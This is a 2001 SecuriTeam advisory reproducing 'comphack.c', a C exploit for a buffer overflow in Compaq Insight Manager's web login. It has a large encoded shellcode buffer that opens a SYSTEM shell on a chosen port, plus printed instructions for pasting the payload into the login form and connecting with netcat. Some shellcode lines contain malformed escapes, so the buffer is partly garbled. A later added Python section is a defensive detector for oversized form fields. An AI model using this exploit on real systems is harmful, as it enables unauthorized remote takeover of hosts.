[EXPL] Compaq Insight Manager Remote SYSTEM Shell (Exploit)

From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] Compaq Insight Manager Remote SYSTEM Shell (Exploit)
Message-Id: <20011201154715.C06E8138BF@mail.der-keiler.de>
Date: Sat,  1 Dec 2001 16:47:15 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Compaq Insight Manager Remote SYSTEM Shell (Exploit)
------------------------------------------------------------------------

SUMMARY

As we reported in our previous article,
<http://www.securiteam.com/securitynews/5SP0V005FW.html> Compaq
Web-Enabled Management Software Security Vulnerability, a buffer
overflow in the product's web-enabled management software lets a remote
attacker execute arbitrary code on the host, and so gain access to the
system without a valid username or password.

Exploit code has now been released that demonstrates this vulnerability.

DETAILS

Exploit:
/* comphack.c - Compaq Insight Manager overflow exploit by Indigo
<indig0@talk21.com> 2001
    Usage: comphack <victim port>

    This code has been compiled and tested on Linux and Win32
    The shellcode spawns a SYSTEM shell on the chosen port

    Main shellcode adapted from code written by izan@deepzone.org

    Greets to:

    Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds
*/

/* #include <windows.h> uncomment if compiling on Win32 (windows.h supplies htons) */
#include <stdio.h>
#include <stdlib.h>     /* atoi, exit */
#ifndef _WIN32
#include <arpa/inet.h>  /* htons on Linux */
#endif

int main(int argc, char **argv)
{

/* Buffer written to exploit.bin; the chosen port is patched into it at
   offsets 1650-1651 below, XORed with 0x5f5f before being stored */
unsigned char shellcode[] =

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77\xFF\xE1\x03\x10"
"\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7\x31\xC9\xB1\x6F"
"\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07\x31\xDB\xB3\x18"
"\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3\x1D\x01\xDF\x29\x07"
"\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07\xB3\x05\x01\xDF"
"\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07\xB3\x12\x01\xDF"
"\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01\xDF\x29\x07\xB3\x14"
"\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3\x3F\x01\xDF\x29\x07"
"\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07\xB3\x08\x01\xDF"
"\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07\x66\x81"
"\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07\x47\x47\x47\x47"
"\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7\x5F\x5F\x5F\x5F"
"\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
"\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7\xAD\x5D\x5F\x5F\xD2"
"\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35\x55\xCF\xCF\xCF"
"\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6\x7A\x1F\x5F\x09"
"\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6\x7A\x1F\x5F\x09\xA0\xCA"
"\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6\x7A\x1F\x5F\x09\xD2\xEA\xB2"
"\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0\xCA\x6C\x7A\x1F"
"\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2\xEA\xAA\x7A\x1F"
"\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79\x1F\x5F\xF2\x0F"
"\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79\x1F\x5F\xF2\x0F\xA0\xCA"
"\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2\xE2\x72\x79\x1F\x5F"
"\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2\x6E\x79\x1F\x5F\xF4\xD2"
"\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79\x1F\x5F\x5F\x5F\x5F\x5F"
"\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2\xEA\x66\x79\x1F\x5F"
"\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35\x5F\x35\x4F\x35\x5E"
"\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35\x5F\xA0\xCA\x64"
"\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37\x5F\x5D\x5F\x5F\xA0\xCA"
"\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
"\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2\xEA\xB6\x7A\x1F"
"\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35\x5C\x0C\xA0\xCA\x5D\x7A"
"\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6\x7A\x1F\x5F\x09"
"\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79\x1F\x5F\xF4\x6C\xBF"
"\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F"
"\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08"
"\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F"
"\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2\x3A\x79\x1F\x5F\x5D"
"\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79\x1F\x5F\x5E\x7F\x5F\x5F"
"\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79\x1F\x5F\x5F\x7F\x5F\x5F"
"\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F"
"\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0"
"\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xD4\xDA\x3A"
"\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79\x1F\x5F\xF2\x0F\xD2\xEA"
"\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55\x7A\x1F\x5F\x35\x5F\xD2\xE2"
"\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2\xEA\xB6\x7A\x1F"
"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F"
"\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38\xA0\xA0\xA0\x35"
"\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79\x1F\x5F\xF2\x0F\xD2"
"\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51\x7A\x1F\x5F\xD6\xDA\x3E"
"\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD2\xEA\x0E"
"\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x14"
"\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35\x5F\xD4\xDA\x3E"
"\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4\xDA\x0E\x79\x1F"
"\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x18\x7A\x1F\x5F"
"\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0\xA0\xD2\xEA\x06"
"\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2\xEA\x02\x79\x1F"
"\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0\xCA\x08\x7A\x1F"
"\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0\x4D\x0F\x04\x06\x08"
"\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0\x4D\x0F\xF3\xDB"
"\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10\x1C\x14\x6C\x6D"
"\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31\x3B\x5F\x33\x36\x2C"
"\x2B\x3A\x31\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31\x3B\x5F"
"\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30\x3C\x34\x3A\x2B"
"\x5F\x14\x1A\x2D\x11\x1A\x13\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
"\x0F\x36\x2F\x3A\x5F\x18\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
"\x31\x39\x30\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30\x3C\x3A"
"\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32\x3A\x3B\x0F\x36\x2F"
"\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30\x3C\x5F\x2D\x3A"
"\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36\x2B\x3A\x19\x36\x33\x3A"
"\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30\x2C\x3A\x17\x3E\x31\x3B"
"\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30\x3C\x3A\x2C\x2C\x5F\x1C"
"\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31\x7F\x63\x36\x25"
"\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71\x30\x2D\x38\x61"
"\x5D\x5F\x40\x17\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
"\x53\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x1C\x12\x1B\x71\x1A\x07\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5Fx5F\x5F\x5F\x5F"
"\x56\x56\x56\x56\x56\x00";
                
FILE *fp;
unsigned short int a_port;

printf ("\nCompaq Insight Manager overflow launcher\nby Indigo <indig0@talk21.com> 2001\n\n");
printf ("This program will generate a binary file called exploit.bin\n");
printf ("Connect to the victim using a web browser http://victim:2301\n");
printf ("Next to \'Login Account\', click on \'anonymous\'\n");
printf ("Enter some random characters into the \'password\' field\n");
printf ("Open exploit.bin in notepad, highlight it then copy to the clipboard\n");
printf ("Paste the exploit into the \'Name\' field and click OK\n");
printf ("\nLaunch netcat: nc <victim host> <victim port>\n");
printf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n");

if (argc != 2)
{
        printf ("Usage: %s <victim port>\n", argv[0]);
        exit (0);
}

/* Port in network byte order, XORed with 0x5f5f, written into the buffer */
a_port = htons(atoi(argv[1]));
a_port ^= 0x5f5f;

shellcode[1650] = (a_port) & 0xff;
shellcode[1651] = (a_port >> 8) & 0xff;

fp = fopen ("./exploit.bin","wb");
if (fp == NULL)
{
        perror ("fopen");
        return 1;
}

/* fputs stops at the first NUL; the buffer contains none before its terminator */
fputs ((char *) shellcode, fp);

fclose (fp);

return 0;

}
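As an added, defender-side illustration (not part of the advisory and not Indigo's code): the exploit above is delivered as a very long, largely non-printable value pasted into the login form's 'Name' field of the management agent on port 2301, and the buffer opens with several hundred repeated 0x61 bytes. A logging proxy or IDS in front of the agent can flag such a submission on three cheap properties of a form field: its length, the presence of non-printable bytes, and long runs of a single byte. The two HTTP requests below are constructed, and the form parameter names (account, password, Name) are assumed placeholders, not the product's real ones.

```python
"""Flag login-form submissions that look like a stuffed overflow buffer.

Added example for the advisory above, written for a logging proxy or IDS
sitting in front of the management agent on port 2301.  Form parameter
names ('account', 'password', 'Name') are assumed placeholders, and both
sample requests are constructed, not captured traffic.
"""
from urllib.parse import quote_from_bytes, unquote_to_bytes

MAX_FIELD_LEN = 256   # assumed: no legitimate login field approaches this
MIN_RUN = 64          # a run of one byte this long is padding, not a name
FORM_TYPE = "application/x-www-form-urlencoded"


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (request line, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def form_fields(body: bytes) -> dict:
    """Decode a urlencoded body into {field name: raw bytes}, keeping binary intact."""
    fields = {}
    for pair in body.split(b"&"):
        if not pair:
            continue
        name, _, value = pair.partition(b"=")
        key = unquote_to_bytes(name.replace(b"+", b" ")).decode("latin-1")
        fields[key] = unquote_to_bytes(value.replace(b"+", b" "))
    return fields


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def inspect_login(raw: bytes) -> list:
    """Return findings for one request; an empty list means nothing odd."""
    request_line, headers, body = parse_request(raw)
    is_form_post = request_line.startswith("POST ") and \
        headers.get("content-type", "").startswith(FORM_TYPE)
    if not is_form_post:
        return []
    findings = []
    for name, value in form_fields(body).items():
        if len(value) > MAX_FIELD_LEN:
            findings.append(f"{name}: length {len(value)} exceeds {MAX_FIELD_LEN}")
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append(f"{name}: contains non-printable bytes")
        run = longest_run(value)
        if run >= MIN_RUN:
            findings.append(f"{name}: run of {run} identical bytes (padding)")
    return findings


# Constructed sample traffic: a normal login and a stuffed 'Name' field.
HEAD = (b"POST /login HTTP/1.0\r\nHost: 10.0.0.5:2301\r\n"
        b"Content-Type: " + FORM_TYPE.encode() + b"\r\n\r\n")
BENIGN = HEAD + b"account=anonymous&password=x&Name=jsmith"
# Stand-in with the same shape as the buffer above (0x61 padding, then
# high bytes); constructed filler, not the payload from the listing.
FAKE_PAYLOAD = b"a" * 500 + bytes(range(0x80, 0x100)) * 4
SUSPECT = (HEAD + b"account=anonymous&password=zzz&Name="
           + quote_from_bytes(FAKE_PAYLOAD).encode())

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_login(req) or "clean")
```

Run directly, it prints "clean" for the normal login and three findings for the stuffed one. The thresholds are tuned per form; for the buffer on this page, which is well over a kilobyte, the length check alone is decisive, and the run-length check additionally separates padding from a merely long but legitimate value.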

ADDITIONAL INFORMATION

The information has been provided by <mailto:indig0@talk21.com> Indigo.
